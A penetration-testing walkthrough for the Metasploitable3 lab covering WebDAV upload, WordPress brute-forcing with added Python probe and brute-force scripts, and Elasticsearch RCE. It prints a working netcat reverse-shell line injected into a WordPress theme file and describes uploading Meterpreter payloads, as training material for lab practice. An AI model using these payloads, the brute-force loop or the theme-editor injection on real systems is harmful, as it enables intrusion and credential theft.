Exploiting Port 8585 – WebDAV
There are multiple services running on this single port.
WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP that lets clients create, modify and delete content on a web server remotely. In Metasploitable3, the uploads directory looks promising, and for now it is completely empty:
Enumerating WebDAV using Directory Buster
dirb (not to be confused with the OWASP DirBuster GUI) is a command-line tool that brute-forces directory and file names on a web server from a wordlist.
Now you can use several methods to determine whether you are allowed to upload files to this directory with the HTTP PUT method.
Enumerating WebDAV using Nmap
As you can see, the web server allows you to upload files to the uploads directory with PUT and even to delete them with DELETE.
Enumerating WebDAV using Nikto
You can also use this web vulnerability scanner to identify features of the web server. If the HTTP PUT method is enabled, Nikto indicates it as follows:
The last line of the Nikto output indicates that the uploads directory allows file uploads using HTTP PUT.
Enumerating WebDAV using Metasploit
Metasploit can also enumerate WebDAV.
As you can see, the uploads directory is writable and a number of different file types can be uploaded there.
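The scanners above mostly report what the server's OPTIONS response advertises. The check a practitioner wants is to actually PUT a harmless marker file, GET it back and DELETE it, once per file extension, because a WebDAV directory frequently accepts .txt while refusing .php or .asp. The script below is an added example written for this page, not code from the original walkthrough or from nmap, Nikto or Metasploit. The target host, port and /uploads/ path are assumptions, and the _DemoDavHandler at the bottom is a constructed stand-in for the target so the script runs offline (it refuses .php the way a hardened directory often does).

```python
"""Verify WebDAV PUT/DELETE per file extension by actually using the methods.

Added example for this page, not code from the original walkthrough or from
nmap/nikto/Metasploit. Target host, port and path are assumptions; the
_DemoDavHandler below is a constructed stand-in for the target.
"""
import http.client
import threading
import uuid
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

OK_PUT = {200, 201, 204}
OK_DELETE = {200, 202, 204}


def _request(host, port, method, path, body=None, headers=None):
    """One request on a fresh connection; returns (status, headers, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.getheaders(), resp.read()
    finally:
        conn.close()


def probe_webdav(host, port, path="/uploads/",
                 extensions=("txt", "php", "asp", "aspx")):
    """Return what the server advertises (Allow header) and, per extension,
    whether a PUT -> GET -> DELETE round trip of a marker file really worked."""
    status, hdrs, _ = _request(host, port, "OPTIONS", path)
    allow = next((v for k, v in hdrs if k.lower() == "allow"), "")
    files = {}
    for ext in extensions:
        # Random name so the probe never clobbers an existing file.
        name = f"{path}dav-probe-{uuid.uuid4().hex}.{ext}"
        marker = b"webdav write probe\n"
        put, _, _ = _request(host, port, "PUT", name, body=marker,
                             headers={"Content-Type": "application/octet-stream"})
        get, _, data = _request(host, port, "GET", name)
        delete, _, _ = _request(host, port, "DELETE", name)
        files[ext] = {
            "put": put, "get": get, "delete": delete,
            # Count the upload only if the server serves the same bytes back.
            "writable": put in OK_PUT and get == 200 and data == marker,
            "deletable": delete in OK_DELETE,
        }
    return {"options_status": status, "allow": allow, "files": files}


class _DemoDavHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target: /uploads/ accepts PUT and DELETE
    but refuses .php, as a partially hardened WebDAV directory often does."""
    store = {}

    def log_message(self, *args):  # keep the example quiet
        pass

    def _reply(self, code, body=b"", extra=()):
        self.send_response(code)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra=[("Allow", "OPTIONS, GET, HEAD, PUT, DELETE, PROPFIND"),
                                ("DAV", "1,2")])

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if not self.path.startswith("/uploads/") or self.path.endswith(".php"):
            return self._reply(403)
        self.store[self.path] = body
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            return self._reply(404)
        self._reply(200, body)

    def do_DELETE(self):
        if self.store.pop(self.path, None) is None:
            return self._reply(404)
        self._reply(204)


def start_demo_server():
    """Serve the constructed handler on an ephemeral localhost port."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _DemoDavHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    demo = start_demo_server()
    report = probe_webdav("127.0.0.1", demo.server_address[1])
    print("Allow:", report["allow"])
    for ext, r in report["files"].items():
        print(f"{ext:5} PUT={r['put']} GET={r['get']} DELETE={r['delete']} "
              f"writable={r['writable']} deletable={r['deletable']}")
    demo.shutdown()
```

Against a real target, call probe_webdav with the Metasploitable3 address and port 8585 instead of the demo server; an extension that is "writable" but not "deletable" is worth noting, because you will not be able to clean up after yourself with curl or cadaver later.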
Exploiting WebDAV
Uploading a payload to WebDAV
Now that you know you can upload files to the server, the next step is to create a PHP Meterpreter reverse shell script (with msfvenom) to deploy to the web server. Create the script with these parameters:
- Kali IP: 172.16.1.6
- Kali port: 5555
Now set up a listener (exploit/multi/handler) to receive the incoming connection, choosing the payload that matches the script:
Now you have several options for deploying the payload to the target machine.
Exploiting WebDAV using Nmap
Nmap has a script (http-put) written for exactly this purpose: uploading a file with the HTTP PUT method. Because port 8585 is not listed as an HTTP port in the Nmap services file, you must run a service scan with the -sV flag so that Nmap recognises the service as HTTP; otherwise the script does not run, the upload fails and Nmap only reports an open port with an unknown service.
Now, if you browse to the uploads directory and click on payload.php, you get a Meterpreter shell:
This is a low-privilege shell, but it's a start.
Before you try the other deployment methods, close the Meterpreter session and remove the previous payload from the WebDAV server using curl (an HTTP DELETE request):
Exploiting WebDAV using Metasploit
You can also use the Metasploit auxiliary module auxiliary/scanner/http/http_put to upload a file to the uploads web directory. Use the previously created payload:
Metasploit reports that the upload failed, but checking the uploads directory on the web server shows that the file did go through. Do not rely on the module's verdict alone: confirm the upload with a GET (browser or curl) before moving on.
Set up the same listener as before and repeat the procedure: browse to the payload on the target server and click it.
Exploiting WebDAV using curl
You can also upload the payload using curl:
Exploiting WebDAV using cadaver
Finally, you can also use cadaver, a command-line WebDAV client, to upload the file:
Exploiting Port 8585 – Wordpress
From the start page, click the wordpress link under Your Projects to open the WordPress site running on the target server.
The link to the login page takes you to /wordpress/wp-login.php.
You already have the credentials because you’ve managed to crack the hashes before, remember? Anyway, forget about that and try to get them again.
Brute forcing Wordpress using Nmap
Use your customized wordlists to speed up the process.
You have found four valid sets of credentials.
Brute forcing Wordpress using Metasploit
Brute forcing Wordpress using WPScan
WPScan is a powerful tool that can also be used to brute-force access to a WordPress site:
Now, with valid credentials you can access the admin page:
Try to gather as much information as possible about your target:
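Each of the three tools above decides whether a password is correct from the same two signals in the wp-login.php response, and knowing them lets you run your own wordlists or check a single guess without the tools. A correct POST is answered with a 302 redirect to wp-admin and a Set-Cookie header whose name starts with wordpress_logged_in_; a wrong password gets a 200 with the login form and an error, and the error text for a non-existent user differs from the one for a wrong password, which is what user enumeration relies on. The script below is an added example written for this page, not code from WPScan, Nmap or Metasploit. The host, port and the /wordpress/wp-login.php path are assumptions, the user and password lists are constructed, and the _DemoWpLogin class is a constructed stand-in that knows only the admin/sploit and vagrant/vagrant accounts from this page so the script runs offline.

```python
"""Minimal WordPress login check and brute-force loop.

Added example for this page, not code from WPScan, nmap or Metasploit.
Host, port and LOGIN_PATH are assumptions; _DemoWpLogin is a constructed
stand-in for the target's wp-login.php so the script runs offline.
"""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

LOGIN_PATH = "/wordpress/wp-login.php"  # assumption: path seen on the page


def wp_try_login(host, port, user, password, login_path=LOGIN_PATH):
    """POST one credential pair; return "valid", "wrong-password" or "unknown-user"."""
    form = urllib.parse.urlencode({
        "log": user, "pwd": password, "wp-submit": "Log In",
        "redirect_to": "/wordpress/wp-admin/", "testcookie": "1",
    }).encode()
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        # wp-login.php expects its test cookie back, or it rejects the form.
        conn.request("POST", login_path, body=form, headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": "wordpress_test_cookie=WP+Cookie+check",
        })
        resp = conn.getresponse()
        body = resp.read()
        cookies = [v for k, v in resp.getheaders() if k.lower() == "set-cookie"]
        if resp.status == 302 and any("wordpress_logged_in_" in c for c in cookies):
            return "valid"
        if b"Invalid username" in body or b"Unknown username" in body:
            return "unknown-user"
        return "wrong-password"
    finally:
        conn.close()


def wp_brute(host, port, users, passwords):
    """Try every password for every user; stop early on success or unknown user."""
    found = {}
    for user in users:
        for password in passwords:
            verdict = wp_try_login(host, port, user, password)
            if verdict == "valid":
                found[user] = password
                break
            if verdict == "unknown-user":
                break  # no point spending the wordlist on a user that does not exist
    return found


class _DemoWpLogin(BaseHTTPRequestHandler):
    """Constructed stand-in for wp-login.php; knows only the page's two accounts."""
    accounts = {"admin": "sploit", "vagrant": "vagrant"}

    def log_message(self, *args):  # keep the example quiet
        pass

    def _page(self, status, body, extra=()):
        self.send_response(status)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        form = urllib.parse.parse_qs(raw)
        user = form.get("log", [""])[0]
        pwd = form.get("pwd", [""])[0]
        if user not in self.accounts:
            self._page(200, b'<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>')
        elif self.accounts[user] != pwd:
            self._page(200, b'<div id="login_error"><strong>ERROR</strong>: '
                            b'The password you entered is incorrect.</div>')
        else:
            self._page(302, b"", extra=[
                ("Location", "/wordpress/wp-admin/"),
                ("Set-Cookie", f"wordpress_logged_in_0123abcd={user}%7C1700000000%7Cdemo; "
                               "path=/wordpress/; HttpOnly"),
            ])


def start_demo_server():
    """Serve the constructed handler on an ephemeral localhost port."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _DemoWpLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    demo = start_demo_server()
    users = ["admin", "nobody", "vagrant"]           # constructed
    passwords = ["password", "sploit", "vagrant"]    # constructed
    print(wp_brute("127.0.0.1", demo.server_address[1], users, passwords))
    demo.shutdown()
```

On a real site, a login-lockout plugin or a WAF turns every attempt into a 200 or 403 after a few tries, so treat a run of "wrong-password" with no "valid" for a credential you know to be good as a sign you are being throttled, not as proof the wordlist is wrong.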
Enumerating Wordpress using Nmap
Important information: the installed plugins…
NOTE: Pay attention to the syntax of the NSE scripts.
Enumerating Wordpress using WPScan
This is widely regarded as the definitive tool for gathering information about a WordPress site:
Enumerating Wordpress using Metasploit
This module enumerates the existing users and then checks the supplied credentials against them.
Exploiting Wordpress
You can log in to the site, but what you want is a shell, right? WordPress does not let you upload arbitrary files the way WebDAV did, but the theme editor lets you add code to the PHP files of the active theme.
Log in to WordPress as either admin/sploit or vagrant/vagrant and open Appearance > Editor.
On the right side, select a PHP file, preferably header.php (it is included on every page, so the payload runs as soon as the homepage is loaded).
You will see the PHP code for that file:
Exploiting Wordpress using Metasploit
To open a Meterpreter shell, create a suitable payload with msfvenom:
Open the generated payload and adjust the code: msfvenom wraps the opening <?php tag in a comment (/*<?php /**/), so uncomment it at the beginning and add the closing ?> tag at the end:
Now insert this code at the top of header.php in the code editor:
Press the Update File button.
Now set up a listener on the Kali machine, ready to receive the incoming connection:
Go back to your browser and reload the WordPress homepage:
And you have a shell on the target machine.
Exploiting Wordpress using Netcat
If the target machine has Netcat or a similar tool installed, it can be used to open a simple reverse shell.
Add the following code to the page, using Kali's IP and listener port:
<?php echo shell_exec("nc.exe 172.16.1.6 5555 -e cmd.exe"); ?>
Press the Update File button.
Now set up a Netcat listener on Kali:
Now reloading the WordPress homepage in the browser runs the Netcat (or equivalent) command, and a reverse connection to Kali is established.
Exploiting Port 9200 – Elastic Search
Elasticsearch is a real-time, distributed, open-source full-text search and analytics engine, and older versions are known to have remote code execution vulnerabilities. Start by accessing Metasploitable3's IP address on port 9200, which returns a JSON banner that includes the version:
Enumerating Elastic Search using Metasploit
There is a Metasploit module to get information about the service:
You can even retrieve files from the target machine's file system:
Exploiting using Metasploit
Metasploit also has a module (exploit/multi/elasticsearch/script_mvel_rce) for a vulnerability present in this version (1.1.1) of the service: Elasticsearch before 1.2 accepts dynamic MVEL scripts in search requests by default, which allows arbitrary Java code execution (CVE-2014-3120):